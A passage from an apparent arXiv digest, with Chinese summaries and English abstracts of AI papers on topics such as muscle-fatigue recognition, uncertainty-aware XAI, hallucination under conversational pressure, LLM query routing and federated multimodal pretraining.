marginal gains for weaker ones. We further propose a three-layer evaluation protocol incorporating code structure analysis, reasoning process assessment, and type-specific output verification for comprehensive GIS agent assessment. The system and all evaluation code are publicly available.
[AI-142] FatigueFormer: Static-Temporal Feature Fusion for Robust sEMG-Based Muscle Fatigue Recognition
【速读】:该论文旨在解决表面肌电信号(sEMG)在不同最大自主收缩(MVC)水平下因信号变异性和信噪比(SNR)低而导致的肌肉疲劳动态建模鲁棒性差的问题。解决方案的关键在于提出一种半端到端框架FatigueFormer,其核心创新是通过并行的基于Transformer的序列编码器分别提取静态特征和时序特征动态,并融合二者互补表征,从而提升在低MVC与高MVC条件下模型性能的稳定性与泛化能力。此外,该方法还支持基于注意力机制的可视化分析,揭示不同特征组和时间窗口在不同MVC水平下的贡献差异,增强了对疲劳进展过程的可解释性。
链接: https://arxiv.org/abs/2603.26841
作者: Tong Zhang,Hong Guo,Shuangzhou Yan,Dongkai Weng,Jian Wang,Hongxin Zhang
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:We present FatigueFormer, a semi-end-to-end framework that deliberately combines saliency-guided feature separation with deep temporal modeling to learn interpretable and generalizable muscle fatigue dynamics from surface electromyography (sEMG). Unlike prior approaches that struggle to maintain robustness across varying Maximum Voluntary Contraction (MVC) levels due to signal variability and low SNR, FatigueFormer employs parallel Transformer-based sequence encoders to separately capture static and temporal feature dynamics, fusing their complementary representations to improve performance stability across low- and high-MVC conditions. Evaluated on a self-collected dataset spanning 30 participants across four MVC levels (20-80%), it achieves state-of-the-art accuracy and strong generalization under mild-fatigue conditions. Beyond performance, FatigueFormer enables attention-based visualization of fatigue dynamics, revealing how feature groups and time windows contribute differently across varying MVC levels, offering interpretable insight into fatigue progression.
[AI-143] Concerning Uncertainty – A Systematic Survey of Uncertainty-Aware XAI
【速读】:该论文旨在解决可解释人工智能(Explainable AI, XAI)中不确定性未被充分考虑的问题,即如何将不确定性有效融入解释流程并进行科学评估。其关键解决方案在于识别出三种主流的不确定性量化方法(贝叶斯法、蒙特卡洛法和校准法),并提出三类集成不确定性的方式:评估解释的可信度、约束模型或解释生成过程、显式传递不确定性信息;同时指出当前评估体系碎片化、以模型为中心且缺乏对用户交互与可靠性属性(如校准性、覆盖率、解释稳定性)的系统性报告,强调未来需建立统一的评估原则,连接不确定性传播、鲁棒性与人类决策,并推荐反事实分析和校准技术作为提升可解释性与可靠性一致性的核心方向。
链接: https://arxiv.org/abs/2603.26838
作者: Helena Löfström,Tuwe Löfström,Anders Hjort,Fatima Rabia Yapicioglu
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 21 pages, 2 figures, journal
Abstract:This paper surveys uncertainty-aware explainable artificial intelligence (UAXAI), examining how uncertainty is incorporated into explanatory pipelines and how such methods are evaluated. Across the literature, three recurring approaches to uncertainty quantification emerge (Bayesian, Monte Carlo, and Conformal methods), alongside distinct strategies for integrating uncertainty into explanations: assessing trustworthiness, constraining models or explanations, and explicitly communicating uncertainty. Evaluation practices remain fragmented and largely model centered, with limited attention to users and inconsistent reporting of reliability properties (e.g., calibration, coverage, explanation stability). Recent work leans towards calibration, distribution free techniques and recognizes explainer variability as a central concern. We argue that progress in UAXAI requires unified evaluation principles that link uncertainty propagation, robustness, and human decision-making, and highlight counterfactual and calibration approaches as promising avenues for aligning interpretability with reliability.
[AI-144] A Regression Framework for Understanding Prompt Component Impact on LLM Performance
【速读】:该论文旨在解决如何量化特定提示(prompt)特征对大语言模型(Large Language Models, LLMs)性能影响的问题,尤其在关键应用场景中提供可解释的决策依据。其解决方案的关键在于构建一个统计框架,通过拟合回归模型将提示的不同组成部分与模型评估结果相关联,从而实现对LLM行为的细粒度解析;该方法扩展了传统的可解释人工智能(Explainable Artificial Intelligence, XAI)技术,应用于LLM场景,并在两个开源模型(Mistral-7B 和 GPT-OSS-20B)上验证有效性,结果显示提示中错误示例会显著抑制模型解题能力,而正负指令的影响则呈现矛盾效应。
链接: https://arxiv.org/abs/2603.26830
作者: Andrew Lauziere,Jonathan Daugherty,Taisa Kushner
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Software Engineering (cs.SE)
备注: 9 pages, 4 figures, 1 table
Abstract:As large language models (LLMs) continue to improve and see further integration into software systems, so does the need to understand the conditions in which they will perform. We contribute a statistical framework for understanding the impact of specific prompt features on LLM performance. The approach extends previous explainable artificial intelligence (XAI) methods specifically to inspect LLMs by fitting regression models relating portions of the prompt to LLM evaluation. We apply our method to compare how two open-source models, Mistral-7B and GPT-OSS-20B, leverage the prompt to perform a simple arithmetic problem. Regression models of individual prompt portions explain 72% and 77% of variation in model performances, respectively. We find misinformation in the form of incorrect example query-answer pairs impedes both models from solving the arithmetic query, though positive examples do not. We find significant variability in the impact of positive and negative instructions - these prompts have contradictory effects on model performance. The framework serves as a tool for decision makers in critical scenarios to gain granular insight into how the prompt influences an LLM to solve a task.
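The core regression idea, relating an indicator for a prompt component to observed model performance, can be illustrated with a toy ordinary-least-squares fit; the data and the single indicator feature below are hypothetical, not the paper's:

```python
def fit_ols(x, y):
    # Ordinary least squares for one feature plus intercept,
    # returning (slope, intercept, r_squared).
    n = len(x)
    mx, my = sum(x) / n, sum(y) / n
    sxx = sum((xi - mx) ** 2 for xi in x)
    sxy = sum((xi - mx) * (yi - my) for xi, yi in zip(x, y))
    slope = sxy / sxx
    intercept = my - slope * mx
    ss_res = sum((yi - intercept - slope * xi) ** 2
                 for xi, yi in zip(x, y))
    ss_tot = sum((yi - my) ** 2 for yi in y)
    return slope, intercept, 1.0 - ss_res / ss_tot

# x: 1 if the prompt contained an incorrect example query-answer pair,
# else 0; y: observed accuracy on the arithmetic query (toy numbers).
slope, intercept, r2 = fit_ols([0, 0, 1, 1], [0.9, 0.8, 0.3, 0.2])
```

A strongly negative slope with high R^2 would mirror the paper's finding that misinformation in the prompt impedes solving the task.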
[AI-145] Squish and Release: Exposing Hidden Hallucinations by Making Them Surface as Safety Signals
【速读】:该论文旨在解决生成式 AI(Generative AI)在对话压力下吸收并传播其已识别的错误前提的问题,即“顺序间隙幻觉”(order-gap hallucination)。这种幻觉表现为模型在输出层面看似合规,实则将错误嵌入激活空间中的安全电路,导致难以通过常规输出检查发现。解决方案的关键在于提出一种名为“Squish and Release”(SR)的激活修补架构,其核心是将检测机制解耦为两个模块:一个固定且局部化的检测体(detector body,位于层24-31),负责稳定识别错误;一个可替换的检测核(detector core),控制感知方向——安全核促使模型转向检测模式,吸收核则逆转该过程。该框架实现了对错误前提的高精度释放与恢复,验证了检测作为更稳定的吸引子,并具备模型无关性设计优势。
链接: https://arxiv.org/abs/2603.26829
作者: Nathaniel Oh,Paul Attie
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Language models detect false premises when asked directly but absorb them under conversational pressure, producing authoritative professional output built on errors they already identified. This failure - order-gap hallucination - is invisible to output inspection because the error migrates into the activation space of the safety circuit, suppressed but not erased. We introduce Squish and Release (SR), an activation-patching architecture with two components: a fixed detector body (layers 24-31, the localized safety evaluation circuit) and a swappable detector core (an activation vector controlling perception direction). A safety core shifts the model from compliance toward detection; an absorb core reverses it. We evaluate on OLMo-2 7B using the Order-Gap Benchmark - 500 chains across 500 domains, all manually graded. Key findings: cascade collapse is near-total (99.8% compliance at O5); the detector body is binary and localized (layers 24-31 shift 93.6%, layers 0-23 contribute zero, p < 10^-189); a synthetically engineered core releases 76.6% of collapsed chains; detection is the more stable attractor (83% restore vs 58% suppress); and epistemic specificity is confirmed (false-premise core releases 45.4%, true-premise core releases 0.0%). The contribution is the framework - body/core architecture, benchmark, and core engineering methodology - which is model-agnostic by design.
[AI-146] Throughput Optimization as a Strategic Lever in Large-Scale AI Systems: Evidence from Dataloader and Memory Profiling Innovations
【速读】:该论文旨在解决大规模基础模型(尤其是大语言模型,Large Language Models, LLMs)训练过程中面临的显著计算与内存瓶颈问题,这些问题直接制约了训练效率、成本控制及下一代模型的可扩展性。其核心解决方案在于采用系统级优化策略,整合数据流水线、内存管理、网络架构与编译器技术的协同创新:包括通过OVERLORD框架缓解数据加载瓶颈以提升端到端训练吞吐量;利用DeepSpeed的ZeRO-Offload等CPU卸载策略突破GPU显存限制;借助Triton-distributed实现计算、内存和通信的联合优化;并结合高级性能分析工具识别并消除如动态电压频率调节(Dynamic Voltage and Frequency Scaling, DVFS)等以往被忽视的开销。研究表明,唯有综合多维度的技术突破,方能有效加速AI研发进程、降低运营成本并推动模型规模边界向前拓展。
链接: https://arxiv.org/abs/2603.26823
作者: Mayank Jha
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Performance (cs.PF)
备注: 5 pages double sided
Abstract:The development of large-scale foundation models, particularly Large Language Models (LLMs), is constrained by significant computational and memory bottlenecks. These challenges elevate throughput optimization from a mere engineering task to a critical strategic lever, directly influencing training time, operational cost, and the feasible scale of next-generation models. This paper synthesizes evidence from recent academic and industry innovations to analyze key advancements in training efficiency. We examine architectural solutions to dataloader bottlenecks, such as the OVERLORD framework, which has demonstrated a 4.5% improvement in end-to-end training throughput. We investigate memory optimization techniques designed to overcome the GPU memory wall, including CPU offloading strategies like DeepSpeed’s ZeRO-Offload, which enable the training of models far exceeding single-accelerator capacity. Furthermore, we explore the growing importance of compiler-centric optimizations, exemplified by Triton-distributed, which enables the joint optimization of computation, memory, and communication for substantial performance gains. The analysis is contextualized by advanced profiling tools and hardware characterization studies that identify and mitigate previously overlooked overheads like Dynamic Voltage and Frequency Scaling (DVFS). Findings indicate that a holistic, system-level approach, integrating innovations across data pipelines, memory management, network fabrics, and compiler technologies, is essential for accelerating AI development, managing costs, and pushing the boundaries of model scale.
[AI-147] Epileptic Seizure Prediction Using Patient-Adaptive Transformer Networks
【速读】:该论文旨在解决从脑电图(EEG)记录中进行癫痫发作预测的难题,主要挑战在于患者间的显著差异性以及神经信号复杂的时序结构。其解决方案的关键在于提出一种患者自适应的Transformer框架,采用两阶段训练策略:首先通过自监督预训练学习通用的EEG时序表征,利用自回归序列建模从多通道EEG数据中提取特征;随后进行患者特异性的微调,以实现30秒内癫痫发作 onset 的二分类预测。为支持基于Transformer的序列学习,研究还引入了噪声感知的预处理方法,并将EEG信号离散化为标记化的时序序列,从而在TUH EEG数据集上实现了验证准确率高于90%、F1分数超过0.80的性能,验证了自监督表示学习与患者特异性适配相结合的有效性。
链接: https://arxiv.org/abs/2603.26821
作者: Mohamed Mahdi,Asma Baghdadi
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Epileptic seizure prediction from electroencephalographic (EEG) recordings remains challenging due to strong inter-patient variability and the complex temporal structure of neural signals. This paper presents a patient-adaptive transformer framework for short-horizon seizure forecasting. The proposed approach employs a two-stage training strategy: self-supervised pretraining is first used to learn general EEG temporal representations through autoregressive sequence modeling, followed by patient-specific fine-tuning for binary prediction of seizure onset within a 30-second horizon. To enable transformer-based sequence learning, multichannel EEG signals are processed using noise-aware preprocessing and discretized into tokenized temporal sequences. Experiments conducted on subjects from the TUH EEG dataset demonstrate that the proposed method achieves validation accuracies above 90% and F1 scores exceeding 0.80 across evaluated patients, supporting the effectiveness of combining self-supervised representation learning with patient-specific adaptation for individualized seizure prediction.
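Discretizing a continuous EEG channel into a tokenized sequence can be sketched with uniform amplitude binning; the paper's exact tokenizer is not specified in the abstract, so this scheme and its parameters are assumptions:

```python
def tokenize(signal, vmin, vmax, vocab_size):
    # Clip each sample to [vmin, vmax] and map it to one of
    # vocab_size uniform amplitude bins (token ids 0..vocab_size-1),
    # yielding a discrete sequence a transformer can model
    # autoregressively.
    width = (vmax - vmin) / vocab_size
    tokens = []
    for v in signal:
        v = min(max(v, vmin), vmax)
        t = int((v - vmin) / width)
        tokens.append(min(t, vocab_size - 1))
    return tokens
```

In practice the bin edges would be set from preprocessed, noise-cleaned signal statistics rather than fixed constants.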
[AI-148] PiCSRL: Physics-Informed Contextual Spectral Reinforcement Learning
【速读】:该论文旨在解决高维低样本量(High-dimensional low-sample-size, HDLSS)环境下环境模型构建的可靠性问题,尤其在标注数据稀缺时,传统强化学习(Reinforcement Learning, RL)方法难以有效优化采样策略。其解决方案的关键在于提出PiCSRL(Physics-Informed Contextual Spectral Reinforcement Learning),通过将领域知识编码为嵌入(embedding)并直接融入RL状态表示,结合不确定性感知的信念模型以增强预测准确性;同时利用物理信息特征提升半监督学习下的泛化性能与大规模网络中的可扩展性,从而实现更高效的自适应传感,在湖泊蓝藻基因浓度监测任务中显著优于随机采样和UCB基线方法。
链接: https://arxiv.org/abs/2603.26816
作者: Mitra Nasr Azadani,Syed Usama Imtiaz,Nasrin Alamdari
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: Accepted to IGARSS 2026
Abstract:High-dimensional low-sample-size (HDLSS) datasets constrain reliable environmental model development, where labeled data remain sparse. Reinforcement learning (RL)-based adaptive sensing methods can learn optimal sampling policies, yet their application is severely limited in HDLSS contexts. In this work, we present PiCSRL (Physics-Informed Contextual Spectral Reinforcement Learning), where embeddings are designed using domain knowledge and parsed directly into the RL state representation for improved adaptive sensing. We developed an uncertainty-aware belief model that encodes physics-informed features to improve prediction. As a representative example, we evaluated our approach for a cyanobacterial gene concentration adaptive sampling task using NASA PACE hyperspectral imagery over Lake Erie. PiCSRL achieves optimal station selection (RMSE = 0.153, 98.4% bloom detection rate), outperforming random (0.296) and UCB (0.178) RMSE baselines, respectively. Our ablation experiments demonstrate that physics-informed features improve test generalization (0.52 R^2, +0.11 over raw bands) in semi-supervised learning. In addition, our scalability test shows that PiCSRL scales effectively to large networks (50 stations, 2M combinations) with significant improvements over baselines (p = 0.002). We posit PiCSRL as a sample-efficient adaptive sensing method across Earth observation domains for improved observation-to-target mapping.
[AI-149] Sparse-by-Design Cross-Modality Prediction: L0-Gated Representations for Reliable and Efficient Learning
【速读】:该论文旨在解决多模态预测系统中因模态特异性稀疏化方法(如图结构边或邻域稀疏、Transformer头或层剪枝、独立的表格特征选择流程)导致的性能评估困难、部署复杂及可靠性分析薄弱的问题。其核心挑战在于缺乏一种统一的稀疏化原语,使得跨模态的精度-效率权衡难以比较,且压缩表示下的概率校准能力难以控制。解决方案的关键是提出L0-Gated Cross-Modality Learning (L0GM),这是一种模态无关的、基于特征级别的硬-混凝土门控框架,通过在每种模态的分类器接口处(节点嵌入、CLS池化向量、表格嵌入)直接施加L0风格稀疏性约束,实现端到端可训练的稀疏化,并引入L0退火调度以稳定优化过程并生成清晰的精度-稀疏帕累托前沿,从而在多个公共基准上实现了更少激活维度下的竞争性预测性能和更低的期望校准误差(Expected Calibration Error, ECE)。
链接: https://arxiv.org/abs/2603.26801
作者: Filippo Cenacchi
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Predictive systems increasingly span heterogeneous modalities such as graphs, language, and tabular records, but sparsity and efficiency remain modality-specific (graph edge or neighborhood sparsification, Transformer head or layer pruning, and separate tabular feature-selection pipelines). This fragmentation makes results hard to compare, complicates deployment, and weakens reliability analysis across end-to-end KDD pipelines. A unified sparsification primitive would make accuracy-efficiency trade-offs comparable across modalities and enable controlled reliability analysis under representation compression. We ask whether a single representation-level mechanism can yield comparable accuracy-efficiency trade-offs across modalities while preserving or improving probability calibration. We propose L0-Gated Cross-Modality Learning (L0GM), a modality-agnostic, feature-wise hard-concrete gating framework that enforces L0-style sparsity directly on learned representations. L0GM attaches hard-concrete stochastic gates to each modality’s classifier-facing interface: node embeddings (GNNs), pooled sequence embeddings such as CLS (Transformers), and learned tabular embedding vectors (tabular models). This yields end-to-end trainable sparsification with an explicit control knob for the active feature fraction. To stabilize optimization and make trade-offs interpretable, we introduce an L0-annealing schedule that induces clear accuracy-sparsity Pareto frontiers. Across three public benchmarks (ogbn-products, Adult, IMDB), L0GM achieves competitive predictive performance while activating fewer representation dimensions, and it reduces Expected Calibration Error (ECE) in our evaluation. Overall, L0GM establishes a modality-agnostic, reproducible sparsification primitive that supports comparable accuracy, efficiency, and calibration trade-off analysis across heterogeneous modalities.
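Hard-concrete gates follow a well-known stretch-and-clamp construction over a concrete (Gumbel-sigmoid) relaxation; a minimal sketch, with the commonly used stretch limits and temperature taken as assumed constants:

```python
import math

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

GAMMA, ZETA, BETA = -0.1, 1.1, 2.0 / 3.0  # stretch limits, temperature

def hard_concrete_gate(log_alpha, u):
    # u ~ Uniform(0, 1); reparameterized sample of a hard-concrete gate
    # attached to one representation dimension.
    s = sigmoid((math.log(u) - math.log(1.0 - u) + log_alpha) / BETA)
    s_bar = s * (ZETA - GAMMA) + GAMMA       # stretch to (GAMMA, ZETA)
    return min(1.0, max(0.0, s_bar))         # hard clamp -> exact 0/1 mass

def expected_l0(log_alpha):
    # P(gate != 0): the differentiable per-dimension L0 penalty that an
    # annealing schedule would scale over training.
    return sigmoid(log_alpha - BETA * math.log(-GAMMA / ZETA))
```

Multiplying each classifier-facing feature by its gate and summing `expected_l0` over dimensions gives the sparsity term with an explicit knob (`log_alpha`) per feature.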
[AI-150] DSO: Dual-Scale Neural Operators for Stable Long-term Fluid Dynamics Forecasting
【速读】:该论文旨在解决神经算子(Neural Operator)在长期流体动力学预测中面临的稳定性与精度不足问题,具体表现为局部细节模糊(local detail blurring)和全局趋势偏离(global trend deviation)。其解决方案的关键在于提出双尺度神经算子(Dual-Scale Neural Operator, DSO),通过显式解耦信息处理机制:利用深度可分离卷积(depthwise separable convolutions)提取精细局部特征,同时采用MLP-Mixer模块实现长程全局信息聚合,从而分别捕捉涡旋核心等细粒度结构与整体运动轨迹的演化特性。实验表明,DSO在湍流流动基准测试中显著优于现有方法,预测误差降低超过88%,且长期稳定性优异。
链接: https://arxiv.org/abs/2603.26800
作者: Huanshuo Dong,Hao Wu,Hong Wang,Qin-Yi Zhang,Zhezheng Hao
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Fluid Dynamics (physics.flu-dyn)
备注:
Abstract:Long-term fluid dynamics forecasting is a critically important problem in science and engineering. While neural operators have emerged as a promising paradigm for modeling systems governed by partial differential equations (PDEs), they often struggle with long-term stability and precision. We identify two fundamental failure modes in existing architectures: (1) local detail blurring, where fine-scale structures such as vortex cores and sharp gradients are progressively smoothed, and (2) global trend deviation, where the overall motion trajectory drifts from the ground truth during extended rollouts. We argue that these failures arise because existing neural operators treat local and global information processing uniformly, despite their inherently different evolution characteristics in physical systems. To bridge this gap, we propose the Dual-Scale Neural Operator (DSO), which explicitly decouples information processing into two complementary modules: depthwise separable convolutions for fine-grained local feature extraction and an MLP-Mixer for long-range global aggregation. Through numerical experiments on vortex dynamics, we demonstrate that nearby perturbations primarily affect local vortex structure while distant perturbations influence global motion trends, providing empirical validation for our design choice. Extensive experiments on turbulent flow benchmarks show that DSO achieves state-of-the-art accuracy while maintaining robust long-term stability, reducing prediction error by over 88% compared to existing neural operators.
[AI-151] Explaining Verifying and Aligning Semantic Hierarchies in Vision-Language Model Embeddings
【速读】:该论文旨在解决视觉-语言模型(Vision-Language Model, VLM)在共享图像-文本嵌入空间中语义层次结构不明确的问题,即尽管VLM编码器(如CLIP)在零样本分类和检索任务中表现优异,但其内部语义组织方式缺乏系统性解释与验证。解决方案的关键在于提出一种后验(post-hoc)框架:首先通过类中心的凝聚聚类生成二叉树结构,并利用词典匹配为内部节点命名;其次设计基于树级和边级一致性的度量方法评估语义合理性,并引入不确定性感知早期停止(Uncertainty-Aware Early Stopping, UAES)实现可解释的分层推理;最后提出基于本体引导的轻量级嵌入空间变换方法,利用UMAP从目标本体生成邻域以对齐语义层次。该框架揭示了图像编码器更具判别性、文本编码器更贴近人类知识体系的模态差异,并指出零样本准确率与本体合理性之间存在持续权衡。
链接: https://arxiv.org/abs/2603.26798
作者: Gesina Schwalbe,Mert Keser,Moritz Bayerkuhnlein,Edgar Heinert,Annika Mütze,Marvin Keller,Sparsh Tiwari,Georgii Mikriukov,Diedrich Wolter,Jae Hee Lee,Matthias Rottmann
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Vision-language model (VLM) encoders such as CLIP enable strong retrieval and zero-shot classification in a shared image-text embedding space, yet the semantic organization of this space is rarely inspected. We present a post-hoc framework to explain, verify, and align the semantic hierarchies induced by a VLM over a given set of child classes. First, we extract a binary hierarchy by agglomerative clustering of class centroids and name internal nodes by dictionary-based matching to a concept bank. Second, we quantify plausibility by comparing the extracted tree against human ontologies using efficient tree- and edge-level consistency measures, and we evaluate utility via explainable hierarchical tree-traversal inference with uncertainty-aware early stopping (UAES). Third, we propose an ontology-guided post-hoc alignment method that learns a lightweight embedding-space transformation, using UMAP to generate target neighborhoods from a desired hierarchy. Across 13 pretrained VLMs and 4 image datasets, our method finds systematic modality differences: image encoders are more discriminative, while text encoders induce hierarchies that better match human taxonomies. Overall, the results reveal a persistent trade-off between zero-shot accuracy and ontological plausibility and suggest practical routes to improve semantic alignment in shared embedding spaces.
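The first step of the framework, agglomerative clustering of class centroids into a binary hierarchy, can be sketched with a small average-linkage implementation; the toy centroids and class names below are illustrative, not taken from the paper:

```python
def dist(a, b):
    return sum((x - y) ** 2 for x, y in zip(a, b)) ** 0.5

def agglomerate(centroids, names):
    # Average-linkage agglomerative clustering over class centroids.
    # Each cluster is (tree, member_points); the result is a nested
    # tuple giving the binary hierarchy over class names.
    clusters = [(name, [c]) for name, c in zip(names, centroids)]
    while len(clusters) > 1:
        best = None
        for i in range(len(clusters)):
            for j in range(i + 1, len(clusters)):
                d = sum(dist(p, q) for p in clusters[i][1]
                        for q in clusters[j][1])
                d /= len(clusters[i][1]) * len(clusters[j][1])
                if best is None or d < best[0]:
                    best = (d, i, j)
        _, i, j = best
        merged = ((clusters[i][0], clusters[j][0]),
                  clusters[i][1] + clusters[j][1])
        clusters = [c for k, c in enumerate(clusters) if k not in (i, j)]
        clusters.append(merged)
    return clusters[0][0]

tree = agglomerate([(0, 0), (0, 1), (5, 5), (5, 6)],
                   ["cat", "dog", "car", "bus"])
```

Naming internal nodes against a concept bank, as the paper describes, would then operate on the internal tuples of this tree.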
[AI-152] Robust Batch-Level Query Routing for Large Language Models under Cost and Capacity Constraints
【速读】:该论文旨在解决在成本、GPU资源和并发性约束下,如何高效地将查询路由至大语言模型(Large Language Models, LLMs)的问题。现有基于单个查询的路由方法难以控制批量层面的成本,尤其在非均匀或对抗性批处理场景中表现不佳。其解决方案的关键在于提出一种批量级、资源感知的路由框架,该框架联合优化每个批次的模型分配策略,在满足成本与模型容量限制的前提下实现全局最优;同时引入一种考虑LLM性能预测不确定性的鲁棒变体,并设计离线实例分配机制以平衡多模型间的质量与吞吐量,从而在严格控制资源消耗的同时显著提升系统性能。
链接: https://arxiv.org/abs/2603.26796
作者: Jelena Markovic-Voronov,Kayhan Behdin,Yuanda Xu,Zhengze Zhou,Zhipeng Wang,Rahul Mazumder
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Machine Learning (stat.ML)
备注:
Abstract:We study the problem of routing queries to large language models (LLMs) under cost, GPU resources, and concurrency constraints. Prior per-query routing methods often fail to control batch-level cost, especially under non-uniform or adversarial batching. To address this, we propose a batch-level, resource-aware routing framework that jointly optimizes model assignment for each batch while respecting cost and model capacity limits. We further introduce a robust variant that accounts for uncertainty in predicted LLM performance, along with an offline instance allocation procedure that balances quality and throughput across multiple models. Experiments on two multi-task LLM benchmarks show that robustness improves accuracy by 1-14% over non-robust counterparts (depending on the performance estimator), batch-level routing outperforms per-query methods by up to 24% under adversarial batching, and optimized instance allocation yields additional gains of up to 3% compared to a non-optimized allocation, all while strictly controlling cost and GPU resource constraints.
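One simple way to realize batch-level routing under a cost budget and per-model capacities is a greedy upgrade heuristic; this is an illustrative baseline, not the paper's optimizer, and it assumes the cheapest model has capacity to seed the whole batch:

```python
def route_batch(quality, cost, capacity, budget):
    # quality[q][m]: predicted quality of model m on query q;
    # cost[m]: per-query cost; capacity[m]: max queries per model;
    # budget: total batch cost cap. Seed every query on the cheapest
    # model, then repeatedly apply the feasible upgrade with the best
    # quality gain per extra unit of cost.
    cheapest = min(range(len(cost)), key=lambda m: cost[m])
    assign = [cheapest] * len(quality)
    used = {m: 0 for m in range(len(cost))}
    used[cheapest] = len(quality)
    spent = cost[cheapest] * len(quality)
    while True:
        best = None  # (gain_per_cost, query, model)
        for q, a in enumerate(assign):
            for m in range(len(cost)):
                extra = cost[m] - cost[a]
                gain = quality[q][m] - quality[q][a]
                if (gain > 0 and used[m] < capacity[m]
                        and spent + extra <= budget):
                    score = gain / max(extra, 1e-9)
                    if best is None or score > best[0]:
                        best = (score, q, m)
        if best is None:
            return assign, spent
        _, q, m = best
        spent += cost[m] - cost[assign[q]]
        used[assign[q]] -= 1
        used[m] += 1
        assign[q] = m

assign, spent = route_batch(
    quality=[[0.5, 0.9], [0.5, 0.6], [0.4, 0.95]],
    cost=[1, 4], capacity=[10, 1], budget=8)
```

The joint, batch-wide optimization the paper studies would replace this greedy loop with an exact or robust formulation, but the constraint structure is the same.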
[AI-153] A Firefly Algorithm for Mixed-Variable Optimization Based on Hybrid Distance Modeling
【速读】:该论文旨在解决混合变量优化问题(Mixed-variable Optimization Problems),即在实际优化场景中同时存在连续、序数和分类决策变量的复杂搜索空间难以被传统群体智能算法有效处理的问题。现有大部分基于种群的元启发式算法仅适用于连续或离散优化,无法自然地融合异质变量类型。其解决方案的关键在于提出一种改进的萤火虫算法(Firefly Algorithm for mixed-variable optimization, FAmv),通过引入一种基于距离的吸引力机制的重构方法,将连续与离散变量的度量统一整合到一个混合距离框架中,从而实现对异构搜索空间的更精确建模,并在探索(exploration)与开发(exploitation)之间保持良好平衡。实验表明,该方法在CEC2013混合变量基准测试及工程设计问题上均表现出优越且稳健的性能。
链接: https://arxiv.org/abs/2603.26792
作者: Ousmane Tom Bechir,Adán José-García,Zaineb Chelly Garcia,Vincent Sobanski,Clarisse Dhaenens
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 25 pages, 15 figures, 7 tables
Abstract:Several real-world optimization problems involve mixed-variable search spaces, where continuous, ordinal, and categorical decision variables coexist. However, most population-based metaheuristic algorithms are designed for either continuous or discrete optimization problems and do not naturally handle heterogeneous variable types. In this paper, we propose an adaptation of the Firefly Algorithm for mixed-variable optimization problems (FAmv). The proposed method relies on a modified distance-based attractiveness mechanism that integrates continuous and discrete components within a unified formulation. This mixed-distance approach enables a more appropriate modeling of heterogeneous search spaces while maintaining a balance between exploration and exploitation. The proposed method is evaluated on the CEC2013 mixed-variable benchmark, which includes unimodal, multimodal, and composition functions. The results show that FAmv achieves competitive, and often superior, performance compared with state-of-the-art mixed-variable optimization algorithms. In addition, experiments on engineering design problems further highlight the robustness and practical applicability of the proposed approach. These results indicate that incorporating appropriate distance formulations into the Firefly Algorithm provides an effective strategy for solving complex mixed-variable optimization problems.
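A mixed distance of the kind described, combining a Euclidean term over continuous dimensions with a Hamming term over categorical ones, can be plugged into the standard firefly attractiveness; the equal weighting of the two terms below is an assumption:

```python
import math

def mixed_distance(x, y, cat_idx):
    # Squared Euclidean over continuous dims plus Hamming count over
    # categorical dims (indices in cat_idx), combined into one metric.
    cont = sum((a - b) ** 2 for i, (a, b) in enumerate(zip(x, y))
               if i not in cat_idx)
    cat = sum(1 for i in cat_idx if x[i] != y[i])
    return math.sqrt(cont + cat)

def attractiveness(beta0, gamma, d):
    # Standard firefly attractiveness: beta(d) = beta0 * exp(-gamma d^2).
    return beta0 * math.exp(-gamma * d * d)

d = mixed_distance([0.0, "a", 3.0], [4.0, "b", 3.0], cat_idx={1})
```

In the full algorithm, this attractiveness value would scale the movement of one firefly toward a brighter one in the heterogeneous search space.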
[AI-154] A Step Toward Federated Pretraining of Multimodal Large Language Models
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)预训练阶段因高质量公共数据饱和而导致的性能瓶颈问题,尤其是在隐私敏感数据孤岛中难以获取多样化多模态数据的场景下。现有联邦学习(Federated Learning, FL)研究主要聚焦于微调阶段,而忽略了基础预训练环节。为此,作者首次提出联邦多模态对齐(Federated MLLM Alignment, Fed-MA)任务,设计了一种轻量级预训练范式:冻结视觉编码器与语言模型(Language Model, LLM),仅协同训练跨模态投影器(cross-modal projector)。其核心挑战在于本地投影器聚合时的参数干扰以及单次遍历协同随机梯度下降(SGD)中的梯度振荡。解决方案的关键是提出Fed-CMP框架,包含两个创新机制:一是基于规范可靠性感知聚合(Canonical Reliability-Aware Aggregation),通过构建规范空间将客户端投影器分解为共享对齐基和客户端特定系数,并进行可靠性加权融合以抑制参数干扰;二是正交性保持动量(Orthogonality-Preserved Momentum),通过对共享对齐基应用正交投影来引入动量,保留几何结构的同时累积历史优化方向,从而稳定训练过程并提升性能。
链接: https://arxiv.org/abs/2603.26786
作者: Baochen Xiong,Yifan Xu,Xiaoshan Yang,Yaguang Song,Yaowei Wang,Changsheng Xu
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
